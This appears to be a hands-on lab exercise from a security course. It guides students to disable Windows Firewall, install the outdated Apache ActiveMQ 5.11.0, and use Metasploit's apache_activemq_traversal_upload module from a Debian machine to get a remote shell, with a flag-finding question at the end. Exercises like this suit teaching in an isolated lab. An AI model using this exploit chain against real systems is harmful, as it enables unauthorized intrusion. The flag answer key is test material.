H 310: Metasploit v. ActiveMQ (20 pts)

What you need


To practice using Metasploit to exploit a vulnerable Windows application.

Task 1: Preparing the Windows Target

Turning Off Windows Firewall

At the lower left of the Windows desktop, click the magnifying glass icon.


In the Search results, click "Windows Firewall", the second result in the image below.

In the Windows Firewall box, on the left side, click "Turn Windows Firewall on or off".

Check both of the boxes labelled "Turn off Windows Firewall (not recommended)", as shown below.

Click OK.

Installing Java

On your Windows system, in Firefox, go to
Click the red "Java Download" button. Download and install the recommended version. When I did it on May 21, 2020, it was "jre-8u251-windows-x64".

Installing Apache ActiveMQ v5.11.0

This is an old server product with known vulnerabilities. We'll run it, and see how using old software can endanger a modern operating system.

On your Windows system, in Firefox, go to:

Download the apache-activemq-5.11.0-bin.zip file, as shown below.

Open your Downloads folder. Right-click the apache-activemq-5.11.0-bin.zip file and click "Extract All..", Extract.

An "apache-activemq-5.11.0-bin" window opens. From its menu bar, click File, "Open Command Prompt".

Starting ActiveMQ

In the Command Prompt window, execute these commands:
cd apache-activemq-5.11.0
bin\activemq.bat start
ActiveMQ starts, showing "ActiveMQ WebConsole available at" as shown below.

Task 2: Preparing the Debian Server

Installing Metasploit

In an SSH session to your Debian server, execute these commands:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
Metasploit installs, as shown below.

Installing Nmap

Execute this command:
sudo apt install nmap 
Enter y to install the package.

Nmap installs, as shown below.

Testing the Target Server

On your Kali Linux machine, in the Terminal window, execute this command, as shown below, replacing the IP address with the IP address of your Windows Server 2016 machine.
sudo nmap -sV -p8161
You should see the port open, as shown below.

Task 3: Exploiting the Windows Target

Finding a Metasploit Exploit

On your Debian server, execute this command:
msfconsole -q
It asks if you want to setup a database. Reply no.

At the msf5 > prompt, execute this command:

search activemq
A list of exploits appears, as shown below.

Notice that one of them clearly claims to work on version 5.11, outlined in yellow in the image below.

Selecting Options and Target

At the msf5 > prompt, execute these commands:
use exploit/windows/http/apache_activemq_traversal_upload
show options
The options required for this exploit are listed. The required options are RHOSTS and LHOST, as shown below,

At the metasploit prompt, execute these commands, using the correct IP addresses for your Windows and Linux systems, respectively:

You get a shell, as shown below. Press Enter to see a Windows prompt.

H 310.1: Java Module (20 pts)

In the shell, execute this command:
tasklist /m java*
Find the Module name, which is covered by a green box in the image below. That's the flag.

Posted 5-21-2020
Flag number fixed 8-4-20